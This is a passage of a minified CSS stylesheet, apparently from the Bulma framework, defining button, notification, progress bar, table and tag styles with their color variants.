.button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-link.is-light{background-color:#eff1fa;color:#3850b7}.button.is-link.is-light:hover,.button.is-link.is-light.is-hovered{background-color:#e6e9f7;border-color:transparent;color:#3850b7}.button.is-link.is-light:active,.button.is-link.is-light.is-active{background-color:#dce0f4;border-color:transparent;color:#3850b7}.button.is-info{background-color:#3e8ed0;border-color:transparent;color:#fff}.button.is-info:hover,.button.is-info.is-hovered{background-color:#3488ce;border-color:transparent;color:#fff}.button.is-info:focus,.button.is-info.is-focused{border-color:transparent;color:#fff}.button.is-info:focus:not(:active),.button.is-info.is-focused:not(:active){box-shadow:0 0 0 .125em #3e8ed040}.button.is-info:active,.button.is-info.is-active{background-color:#3082c5;border-color:transparent;color:#fff}.button.is-info[disabled],fieldset[disabled] .button.is-info{background-color:#3e8ed0;border-color:#3e8ed0;box-shadow:none}.button.is-info.is-inverted{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted:hover,.button.is-info.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-info.is-inverted[disabled],fieldset[disabled] .button.is-info.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3e8ed0}.button.is-info.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;color:#3e8ed0}.button.is-info.is-outlined:hover,.button.is-info.is-outlined.is-hovered,.button.is-info.is-outlined:focus,.button.is-info.is-outlined.is-focused{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.button.is-info.is-outlined.is-loading:after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-outlined.is-loading:hover:after,.button.is-info.is-outlined.is-loading.is-hovered:after,.button.is-info.is-outlined.is-loading:focus:after,.button.is-info.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined[disabled],fieldset[disabled] .button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;box-shadow:none;color:#3e8ed0}.button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-info.is-inverted.is-outlined:hover,.button.is-info.is-inverted.is-outlined.is-hovered,.button.is-info.is-inverted.is-outlined:focus,.button.is-info.is-inverted.is-outlined.is-focused{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted.is-outlined.is-loading:hover:after,.button.is-info.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-info.is-inverted.is-outlined.is-loading:focus:after,.button.is-info.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-info.is-light{background-color:#eff5fb;color:#296fa8}.button.is-info.is-light:hover,.button.is-info.is-light.is-hovered{background-color:#e4eff9;border-color:transparent;color:#296fa8}.button.is-info.is-light:active,.button.is-info.is-light.is-active{background-color:#dae9f6;border-color:transparent;color:#296fa8}.button.is-success{background-color:#48c78e;border-color:transparent;color:#fff}.button.is-success:hover,.button.is-success.is-hovered{background-color:#3ec487;border-color:transparent;color:#fff}.button.is-success:focus,.button.is-success.is-focused{border-color:transparent;color:#fff}.button.is-success:focus:not(:active),.button.is-success.is-focused:not(:active){box-shadow:0 0 0 .125em #48c78e40}.button.is-success:active,.button.is-success.is-active{background-color:#3abb81;border-color:transparent;color:#fff}.button.is-success[disabled],fieldset[disabled] .button.is-success{background-color:#48c78e;border-color:#48c78e;box-shadow:none}.button.is-success.is-inverted{background-color:#fff;color:#48c78e}.button.is-success.is-inverted:hover,.button.is-success.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-success.is-inverted[disabled],fieldset[disabled] .button.is-success.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#48c78e}.button.is-success.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;color:#48c78e}.button.is-success.is-outlined:hover,.button.is-success.is-outlined.is-hovered,.button.is-success.is-outlined:focus,.button.is-success.is-outlined.is-focused{background-color:#48c78e;border-color:#48c78e;color:#fff}.button.is-success.is-outlined.is-loading:after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-outlined.is-loading:hover:after,.button.is-success.is-outlined.is-loading.is-hovered:after,.button.is-success.is-outlined.is-loading:focus:after,.button.is-success.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined[disabled],fieldset[disabled] .button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;box-shadow:none;color:#48c78e}.button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-success.is-inverted.is-outlined:hover,.button.is-success.is-inverted.is-outlined.is-hovered,.button.is-success.is-inverted.is-outlined:focus,.button.is-success.is-inverted.is-outlined.is-focused{background-color:#fff;color:#48c78e}.button.is-success.is-inverted.is-outlined.is-loading:hover:after,.button.is-success.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-success.is-inverted.is-outlined.is-loading:focus:after,.button.is-success.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-success.is-light{background-color:#effaf5;color:#257953}.button.is-success.is-light:hover,.button.is-success.is-light.is-hovered{background-color:#e6f7ef;border-color:transparent;color:#257953}.button.is-success.is-light:active,.button.is-success.is-light.is-active{background-color:#dcf4e9;border-color:transparent;color:#257953}.button.is-warning{background-color:#ffe08a;border-color:transparent;color:#000000b3}.button.is-warning:hover,.button.is-warning.is-hovered{background-color:#ffdc7d;border-color:transparent;color:#000000b3}.button.is-warning:focus,.button.is-warning.is-focused{border-color:transparent;color:#000000b3}.button.is-warning:focus:not(:active),.button.is-warning.is-focused:not(:active){box-shadow:0 0 0 .125em #ffe08a40}.button.is-warning:active,.button.is-warning.is-active{background-color:#ffd970;border-color:transparent;color:#000000b3}.button.is-warning[disabled],fieldset[disabled] .button.is-warning{background-color:#ffe08a;border-color:#ffe08a;box-shadow:none}.button.is-warning.is-inverted{background-color:#000000b3;color:#ffe08a}.button.is-warning.is-inverted:hover,.button.is-warning.is-inverted.is-hovered{background-color:#000000b3}.button.is-warning.is-inverted[disabled],fieldset[disabled] .button.is-warning.is-inverted{background-color:#000000b3;border-color:transparent;box-shadow:none;color:#ffe08a}.button.is-warning.is-loading:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;color:#ffe08a}.button.is-warning.is-outlined:hover,.button.is-warning.is-outlined.is-hovered,.button.is-warning.is-outlined:focus,.button.is-warning.is-outlined.is-focused{background-color:#ffe08a;border-color:#ffe08a;color:#000000b3}.button.is-warning.is-outlined.is-loading:after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-outlined.is-loading:hover:after,.button.is-warning.is-outlined.is-loading.is-hovered:after,.button.is-warning.is-outlined.is-loading:focus:after,.button.is-warning.is-outlined.is-loading.is-focused:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;box-shadow:none;color:#ffe08a}.button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;color:#000000b3}.button.is-warning.is-inverted.is-outlined:hover,.button.is-warning.is-inverted.is-outlined.is-hovered,.button.is-warning.is-inverted.is-outlined:focus,.button.is-warning.is-inverted.is-outlined.is-focused{background-color:#000000b3;color:#ffe08a}.button.is-warning.is-inverted.is-outlined.is-loading:hover:after,.button.is-warning.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-warning.is-inverted.is-outlined.is-loading:focus:after,.button.is-warning.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;box-shadow:none;color:#000000b3}.button.is-warning.is-light{background-color:#fffaeb;color:#946c00}.button.is-warning.is-light:hover,.button.is-warning.is-light.is-hovered{background-color:#fff6de;border-color:transparent;color:#946c00}.button.is-warning.is-light:active,.button.is-warning.is-light.is-active{background-color:#fff3d1;border-color:transparent;color:#946c00}.button.is-danger{background-color:#f14668;border-color:transparent;color:#fff}.button.is-danger:hover,.button.is-danger.is-hovered{background-color:#f03a5f;border-color:transparent;color:#fff}.button.is-danger:focus,.button.is-danger.is-focused{border-color:transparent;color:#fff}.button.is-danger:focus:not(:active),.button.is-danger.is-focused:not(:active){box-shadow:0 0 0 .125em #f1466840}.button.is-danger:active,.button.is-danger.is-active{background-color:#ef2e55;border-color:transparent;color:#fff}.button.is-danger[disabled],fieldset[disabled] .button.is-danger{background-color:#f14668;border-color:#f14668;box-shadow:none}.button.is-danger.is-inverted{background-color:#fff;color:#f14668}.button.is-danger.is-inverted:hover,.button.is-danger.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-danger.is-inverted[disabled],fieldset[disabled] .button.is-danger.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#f14668}.button.is-danger.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;color:#f14668}.button.is-danger.is-outlined:hover,.button.is-danger.is-outlined.is-hovered,.button.is-danger.is-outlined:focus,.button.is-danger.is-outlined.is-focused{background-color:#f14668;border-color:#f14668;color:#fff}.button.is-danger.is-outlined.is-loading:after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-outlined.is-loading:hover:after,.button.is-danger.is-outlined.is-loading.is-hovered:after,.button.is-danger.is-outlined.is-loading:focus:after,.button.is-danger.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;box-shadow:none;color:#f14668}.button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-danger.is-inverted.is-outlined:hover,.button.is-danger.is-inverted.is-outlined.is-hovered,.button.is-danger.is-inverted.is-outlined:focus,.button.is-danger.is-inverted.is-outlined.is-focused{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-outlined.is-loading:hover:after,.button.is-danger.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-danger.is-inverted.is-outlined.is-loading:focus:after,.button.is-danger.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.button.is-danger.is-light:hover,.button.is-danger.is-light.is-hovered{background-color:#fde0e6;border-color:transparent;color:#cc0f35}.button.is-danger.is-light:active,.button.is-danger.is-light.is-active{background-color:#fcd4dc;border-color:transparent;color:#cc0f35}.button.is-small{font-size:.75rem}.button.is-small:not(.is-rounded){border-radius:2px}.button.is-normal{font-size:1rem}.button.is-medium{font-size:1.25rem}.button.is-large{font-size:1.5rem}.button[disabled],fieldset[disabled] .button{background-color:#fff;border-color:#dbdbdb;box-shadow:none;opacity:.5}.button.is-fullwidth{display:flex;width:100%}.button.is-loading{color:transparent!important;pointer-events:none}.button.is-loading:after{position:absolute;left:calc(50% - .5em);top:calc(50% - .5em);position:absolute!important}.button.is-static{background-color:#f5f5f5;border-color:#dbdbdb;color:#7a7a7a;box-shadow:none;pointer-events:none}.button.is-rounded{border-radius:9999px;padding-left:1.25em;padding-right:1.25em}.buttons{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.buttons .button{margin-bottom:.5rem}.buttons .button:not(:last-child):not(.is-fullwidth){margin-right:.5rem}.buttons:last-child{margin-bottom:-.5rem}.buttons:not(:last-child){margin-bottom:1rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large){font-size:.75rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large):not(.is-rounded){border-radius:2px}.buttons.are-medium .button:not(.is-small):not(.is-normal):not(.is-large){font-size:1.25rem}.buttons.are-large .button:not(.is-small):not(.is-normal):not(.is-medium){font-size:1.5rem}.buttons.has-addons .button:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.buttons.has-addons .button:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0;margin-right:-1px}.buttons.has-addons .button:last-child{margin-right:0}.buttons.has-addons .button:hover,.buttons.has-addons .button.is-hovered{z-index:2}.buttons.has-addons .button:focus,.buttons.has-addons .button.is-focused,.buttons.has-addons .button:active,.buttons.has-addons .button.is-active,.buttons.has-addons .button.is-selected{z-index:3}.buttons.has-addons .button:focus:hover,.buttons.has-addons .button.is-focused:hover,.buttons.has-addons .button:active:hover,.buttons.has-addons .button.is-active:hover,.buttons.has-addons .button.is-selected:hover{z-index:4}.buttons.has-addons .button.is-expanded{flex-grow:1;flex-shrink:1}.buttons.is-centered{justify-content:center}.buttons.is-centered:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.buttons.is-right{justify-content:flex-end}.buttons.is-right:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}@media screen and (max-width: 768px){.button.is-responsive.is-small{font-size:.5625rem}.button.is-responsive,.button.is-responsive.is-normal{font-size:.65625rem}.button.is-responsive.is-medium{font-size:.75rem}.button.is-responsive.is-large{font-size:1rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.button.is-responsive.is-small{font-size:.65625rem}.button.is-responsive,.button.is-responsive.is-normal{font-size:.75rem}.button.is-responsive.is-medium{font-size:1rem}.button.is-responsive.is-large{font-size:1.25rem}}.container{flex-grow:1;margin:0 auto;position:relative;width:auto}.container.is-fluid{max-width:none!important;padding-left:32px;padding-right:32px;width:100%}@media screen and (min-width: 1024px){.container{max-width:960px}}@media screen and (max-width: 1215px){.container.is-widescreen:not(.is-max-desktop){max-width:1152px}}@media screen and (max-width: 1407px){.container.is-fullhd:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}@media screen and (min-width: 1216px){.container:not(.is-max-desktop){max-width:1152px}}@media screen and (min-width: 1408px){.container:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}.content li+li{margin-top:.25em}.content p:not(:last-child),.content dl:not(:last-child),.content ol:not(:last-child),.content ul:not(:last-child),.content blockquote:not(:last-child),.content pre:not(:last-child),.content table:not(:last-child){margin-bottom:1em}.content h1,.content h2,.content h3,.content h4,.content h5,.content h6{color:#363636;font-weight:600;line-height:1.125}.content h1{font-size:2em;margin-bottom:.5em}.content h1:not(:first-child){margin-top:1em}.content h2{font-size:1.75em;margin-bottom:.5714em}.content h2:not(:first-child){margin-top:1.1428em}.content h3{font-size:1.5em;margin-bottom:.6666em}.content h3:not(:first-child){margin-top:1.3333em}.content h4{font-size:1.25em;margin-bottom:.8em}.content h5{font-size:1.125em;margin-bottom:.8888em}.content h6{font-size:1em;margin-bottom:1em}.content blockquote{background-color:#f5f5f5;border-left:5px solid #dbdbdb;padding:1.25em 1.5em}.content ol{list-style-position:outside;margin-left:2em;margin-top:1em}.content ol:not([type]){list-style-type:decimal}.content ol:not([type]).is-lower-alpha{list-style-type:lower-alpha}.content ol:not([type]).is-lower-roman{list-style-type:lower-roman}.content ol:not([type]).is-upper-alpha{list-style-type:upper-alpha}.content ol:not([type]).is-upper-roman{list-style-type:upper-roman}.content ul{list-style:disc outside;margin-left:2em;margin-top:1em}.content ul ul{list-style-type:circle;margin-top:.5em}.content ul ul ul{list-style-type:square}.content dd{margin-left:2em}.content figure{margin-left:2em;margin-right:2em;text-align:center}.content figure:not(:first-child){margin-top:2em}.content figure:not(:last-child){margin-bottom:2em}.content figure img{display:inline-block}.content figure figcaption{font-style:italic}.content pre{-webkit-overflow-scrolling:touch;overflow-x:auto;padding:1.25em 1.5em;white-space:pre;word-wrap:normal}.content sup,.content sub{font-size:75%}.content table{width:100%}.content table td,.content table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.content table th{color:#363636}.content table th:not([align]){text-align:inherit}.content table thead td,.content table thead th{border-width:0 0 2px;color:#363636}.content table tfoot td,.content table tfoot th{border-width:2px 0 0;color:#363636}.content table tbody tr:last-child td,.content table tbody tr:last-child th{border-bottom-width:0}.content .tabs li+li{margin-top:0}.content.is-small{font-size:.75rem}.content.is-normal{font-size:1rem}.content.is-medium{font-size:1.25rem}.content.is-large{font-size:1.5rem}.icon{align-items:center;display:inline-flex;justify-content:center;height:1.5rem;width:1.5rem}.icon.is-small{height:1rem;width:1rem}.icon.is-medium{height:2rem;width:2rem}.icon.is-large{height:3rem;width:3rem}.icon-text{align-items:flex-start;color:inherit;display:inline-flex;flex-wrap:wrap;line-height:1.5rem;vertical-align:top}.icon-text .icon{flex-grow:0;flex-shrink:0}.icon-text .icon:not(:last-child){margin-right:.25em}.icon-text .icon:not(:first-child){margin-left:.25em}div.icon-text{display:flex}.image{display:block;position:relative}.image img{display:block;height:auto;width:100%}.image img.is-rounded{border-radius:9999px}.image.is-fullwidth{width:100%}.image.is-square img,.image.is-square .has-ratio,.image.is-1by1 img,.image.is-1by1 .has-ratio,.image.is-5by4 img,.image.is-5by4 .has-ratio,.image.is-4by3 img,.image.is-4by3 .has-ratio,.image.is-3by2 img,.image.is-3by2 .has-ratio,.image.is-5by3 img,.image.is-5by3 .has-ratio,.image.is-16by9 img,.image.is-16by9 .has-ratio,.image.is-2by1 img,.image.is-2by1 .has-ratio,.image.is-3by1 img,.image.is-3by1 .has-ratio,.image.is-4by5 img,.image.is-4by5 .has-ratio,.image.is-3by4 img,.image.is-3by4 .has-ratio,.image.is-2by3 img,.image.is-2by3 .has-ratio,.image.is-3by5 img,.image.is-3by5 .has-ratio,.image.is-9by16 img,.image.is-9by16 .has-ratio,.image.is-1by2 img,.image.is-1by2 .has-ratio,.image.is-1by3 img,.image.is-1by3 .has-ratio{height:100%;width:100%}.image.is-square,.image.is-1by1{padding-top:100%}.image.is-5by4{padding-top:80%}.image.is-4by3{padding-top:75%}.image.is-3by2{padding-top:66.6666%}.image.is-5by3{padding-top:60%}.image.is-16by9{padding-top:56.25%}.image.is-2by1{padding-top:50%}.image.is-3by1{padding-top:33.3333%}.image.is-4by5{padding-top:125%}.image.is-3by4{padding-top:133.3333%}.image.is-2by3{padding-top:150%}.image.is-3by5{padding-top:166.6666%}.image.is-9by16{padding-top:177.7777%}.image.is-1by2{padding-top:200%}.image.is-1by3{padding-top:300%}.image.is-16x16{height:16px;width:16px}.image.is-24x24{height:24px;width:24px}.image.is-32x32{height:32px;width:32px}.image.is-48x48{height:48px;width:48px}.image.is-64x64{height:64px;width:64px}.image.is-96x96{height:96px;width:96px}.image.is-128x128{height:128px;width:128px}.notification{background-color:#f5f5f5;border-radius:4px;position:relative;padding:1.25rem 2.5rem 1.25rem 1.5rem}.notification a:not(.button):not(.dropdown-item){color:currentColor;text-decoration:underline}.notification strong{color:currentColor}.notification code,.notification pre{background:white}.notification pre code{background:transparent}.notification>.delete{right:.5rem;position:absolute;top:.5rem}.notification .title,.notification .subtitle,.notification .content{color:currentColor}.notification.is-white{background-color:#fff;color:#0a0a0a}.notification.is-black{background-color:#0a0a0a;color:#fff}.notification.is-light{background-color:#f5f5f5;color:#000000b3}.notification.is-dark{background-color:#363636;color:#fff}.notification.is-primary{background-color:#00d1b2;color:#fff}.notification.is-primary.is-light{background-color:#ebfffc;color:#00947e}.notification.is-link{background-color:#485fc7;color:#fff}.notification.is-link.is-light{background-color:#eff1fa;color:#3850b7}.notification.is-info{background-color:#3e8ed0;color:#fff}.notification.is-info.is-light{background-color:#eff5fb;color:#296fa8}.notification.is-success{background-color:#48c78e;color:#fff}.notification.is-success.is-light{background-color:#effaf5;color:#257953}.notification.is-warning{background-color:#ffe08a;color:#000000b3}.notification.is-warning.is-light{background-color:#fffaeb;color:#946c00}.notification.is-danger{background-color:#f14668;color:#fff}.notification.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.progress{-moz-appearance:none;-webkit-appearance:none;border:none;border-radius:9999px;display:block;height:1rem;overflow:hidden;padding:0;width:100%}.progress::-webkit-progress-bar{background-color:#ededed}.progress::-webkit-progress-value{background-color:#4a4a4a}.progress::-moz-progress-bar{background-color:#4a4a4a}.progress::-ms-fill{background-color:#4a4a4a;border:none}.progress.is-white::-webkit-progress-value{background-color:#fff}.progress.is-white::-moz-progress-bar{background-color:#fff}.progress.is-white::-ms-fill{background-color:#fff}.progress.is-white:indeterminate{background-image:linear-gradient(to right,white 30%,#ededed 30%)}.progress.is-black::-webkit-progress-value{background-color:#0a0a0a}.progress.is-black::-moz-progress-bar{background-color:#0a0a0a}.progress.is-black::-ms-fill{background-color:#0a0a0a}.progress.is-black:indeterminate{background-image:linear-gradient(to right,#0a0a0a 30%,#ededed 30%)}.progress.is-light::-webkit-progress-value{background-color:#f5f5f5}.progress.is-light::-moz-progress-bar{background-color:#f5f5f5}.progress.is-light::-ms-fill{background-color:#f5f5f5}.progress.is-light:indeterminate{background-image:linear-gradient(to right,whitesmoke 30%,#ededed 30%)}.progress.is-dark::-webkit-progress-value{background-color:#363636}.progress.is-dark::-moz-progress-bar{background-color:#363636}.progress.is-dark::-ms-fill{background-color:#363636}.progress.is-dark:indeterminate{background-image:linear-gradient(to right,#363636 30%,#ededed 30%)}.progress.is-primary::-webkit-progress-value{background-color:#00d1b2}.progress.is-primary::-moz-progress-bar{background-color:#00d1b2}.progress.is-primary::-ms-fill{background-color:#00d1b2}.progress.is-primary:indeterminate{background-image:linear-gradient(to right,#00d1b2 30%,#ededed 30%)}.progress.is-link::-webkit-progress-value{background-color:#485fc7}.progress.is-link::-moz-progress-bar{background-color:#485fc7}.progress.is-link::-ms-fill{background-color:#485fc7}.progress.is-link:indeterminate{background-image:linear-gradient(to right,#485fc7 30%,#ededed 30%)}.progress.is-info::-webkit-progress-value{background-color:#3e8ed0}.progress.is-info::-moz-progress-bar{background-color:#3e8ed0}.progress.is-info::-ms-fill{background-color:#3e8ed0}.progress.is-info:indeterminate{background-image:linear-gradient(to right,#3e8ed0 30%,#ededed 30%)}.progress.is-success::-webkit-progress-value{background-color:#48c78e}.progress.is-success::-moz-progress-bar{background-color:#48c78e}.progress.is-success::-ms-fill{background-color:#48c78e}.progress.is-success:indeterminate{background-image:linear-gradient(to right,#48c78e 30%,#ededed 30%)}.progress.is-warning::-webkit-progress-value{background-color:#ffe08a}.progress.is-warning::-moz-progress-bar{background-color:#ffe08a}.progress.is-warning::-ms-fill{background-color:#ffe08a}.progress.is-warning:indeterminate{background-image:linear-gradient(to right,#ffe08a 30%,#ededed 30%)}.progress.is-danger::-webkit-progress-value{background-color:#f14668}.progress.is-danger::-moz-progress-bar{background-color:#f14668}.progress.is-danger::-ms-fill{background-color:#f14668}.progress.is-danger:indeterminate{background-image:linear-gradient(to right,#f14668 30%,#ededed 30%)}.progress:indeterminate{-webkit-animation-duration:1.5s;animation-duration:1.5s;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-name:moveIndeterminate;animation-name:moveIndeterminate;-webkit-animation-timing-function:linear;animation-timing-function:linear;background-color:#ededed;background-image:linear-gradient(to right,#4a4a4a 30%,#ededed 30%);background-position:top left;background-repeat:no-repeat;background-size:150% 150%}.progress:indeterminate::-webkit-progress-bar{background-color:transparent}.progress:indeterminate::-moz-progress-bar{background-color:transparent}.progress:indeterminate::-ms-fill{animation-name:none}.progress.is-small{height:.75rem}.progress.is-medium{height:1.25rem}.progress.is-large{height:1.5rem}@-webkit-keyframes moveIndeterminate{0%{background-position:200% 0}to{background-position:-200% 0}}@keyframes moveIndeterminate{0%{background-position:200% 0}to{background-position:-200% 0}}.table{background-color:#fff;color:#363636}.table td,.table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.table td.is-white,.table th.is-white{background-color:#fff;border-color:#fff;color:#0a0a0a}.table td.is-black,.table th.is-black{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.table td.is-light,.table th.is-light{background-color:#f5f5f5;border-color:#f5f5f5;color:#000000b3}.table td.is-dark,.table th.is-dark{background-color:#363636;border-color:#363636;color:#fff}.table td.is-primary,.table th.is-primary{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.table td.is-link,.table th.is-link{background-color:#485fc7;border-color:#485fc7;color:#fff}.table td.is-info,.table th.is-info{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.table td.is-success,.table th.is-success{background-color:#48c78e;border-color:#48c78e;color:#fff}.table td.is-warning,.table th.is-warning{background-color:#ffe08a;border-color:#ffe08a;color:#000000b3}.table td.is-danger,.table th.is-danger{background-color:#f14668;border-color:#f14668;color:#fff}.table td.is-narrow,.table th.is-narrow{white-space:nowrap;width:1%}.table td.is-selected,.table th.is-selected{background-color:#00d1b2;color:#fff}.table td.is-selected a,.table td.is-selected strong,.table th.is-selected a,.table th.is-selected strong{color:currentColor}.table td.is-vcentered,.table th.is-vcentered{vertical-align:middle}.table th{color:#363636}.table th:not([align]){text-align:left}.table tr.is-selected{background-color:#00d1b2;color:#fff}.table tr.is-selected a,.table tr.is-selected strong{color:currentColor}.table tr.is-selected td,.table tr.is-selected th{border-color:#fff;color:currentColor}.table thead{background-color:transparent}.table thead td,.table thead th{border-width:0 0 2px;color:#363636}.table tfoot{background-color:transparent}.table tfoot td,.table tfoot th{border-width:2px 0 0;color:#363636}.table tbody{background-color:transparent}.table tbody tr:last-child td,.table tbody tr:last-child th{border-bottom-width:0}.table.is-bordered td,.table.is-bordered th{border-width:1px}.table.is-bordered tr:last-child td,.table.is-bordered tr:last-child th{border-bottom-width:1px}.table.is-fullwidth{width:100%}.table.is-hoverable tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover:nth-child(2n){background-color:#f5f5f5}.table.is-narrow td,.table.is-narrow th{padding:.25em .5em}.table.is-striped tbody tr:not(.is-selected):nth-child(2n){background-color:#fafafa}.table-container{-webkit-overflow-scrolling:touch;overflow:auto;overflow-y:hidden;max-width:100%}.tags{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.tags .tag{margin-bottom:.5rem}.tags .tag:not(:last-child){margin-right:.5rem}.tags:last-child{margin-bottom:-.5rem}.tags:not(:last-child){margin-bottom:1rem}.tags.are-medium .tag:not(.is-normal):not(.is-large){font-size:1rem}.tags.are-large .tag:not(.is-normal):not(.is-medium){font-size:1.25rem}.tags.is-centered{justify-content:center}.tags.is-centered .tag{margin-right:.25rem;margin-left:.25rem}.tags.is-right{justify-content:flex-end}.tags.is-right .tag:not(:first-child){margin-left:.5rem}.tags.is-right .tag:not(:last-child){margin-right:0}.tags.has-addons .tag{margin-right:0}.tags.has-addons .tag:not(:first-child){margin-left:0;border-top-left-radius:0;border-bottom-left-radius:0}.tags.has-addons .tag:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.tag:not(body){align-items:center;background-color:#f5f5f5;border-radius:4px;color:#4a4a4a;display:inline-flex;font-size:.75rem;height:2em;justify-content:center;line-height:1.5;padding-left:.75em;padding-right:.75em;white-space:nowrap}.tag:not(body) .delete{margin-left:.25rem;margin-right:-.375rem}.tag:not(body).is-white{background-color:#fff;color:#0a0a0a}.tag:not(body).is-black{background-color:#0a0a0a;color:#fff}.tag:not(body).is-light{background-color:#f5f5f5;color:#000000b3}.tag:not(body).is-dark{background-color:#363636;color:#fff}.tag:not(body).is-primary{background-color:#00d1b2;color:#fff}.tag:not(body).is-primary.is-light{background-color:#ebfffc;color:#00947e}.tag:not(body).is-link{background-color:#485fc7;color:#fff}.tag:not(body).is-link.is-light{background-color:#eff1fa;color:#3850b7}.tag:not(body).is-info{background-color:#3e8ed0;color:#fff}.tag:not(body).is-info.is-light{background-color:#eff5fb;color:#296fa8}.tag:not(body).is-success{background-color:#48c78e;color:#fff}.tag:not(body).is-success.is-light{background-color:#effaf5;color:#257953}.tag:not(body).is-warning{background-color:#ffe08a;color:#000000b3}.tag:not(body).is-warning.is-light{background-color:#fffaeb;color:#946c00}.tag:not(body).is-danger{background-color:#f14668;color:#fff}.tag:not(body).is-danger.is-light{background-color:#feecf0;color:#cc0f35}.tag:not(body).is-normal{font-size:.75rem}.tag:not(body).is-medium{font-size:1rem}.tag:not(body).is-large{font-size:1.25rem}.tag:not(body) .icon:first-child:not(:last-child){margin-left:-.375em;margin-right:.1875em}.tag:not(body) .icon:last-child:not(:first-child){margin-left:.1875em;margin-right:-.375em}.tag:not(body) .icon:first-child:last-child{margin-left:-.375em;margin-right:-.375em}.tag:not(body).is-delete{margin-left:1px;padding:0;position:relative;width:2em}.tag:not(body).is-delete:before,.tag:not(body).is-delete:after{background-color:currentColor;content:"";display:block;left:50%;position:absolute;top:50%;transform:translate(-50%) translateY(-50%) rotate(45deg);transform-origin:center 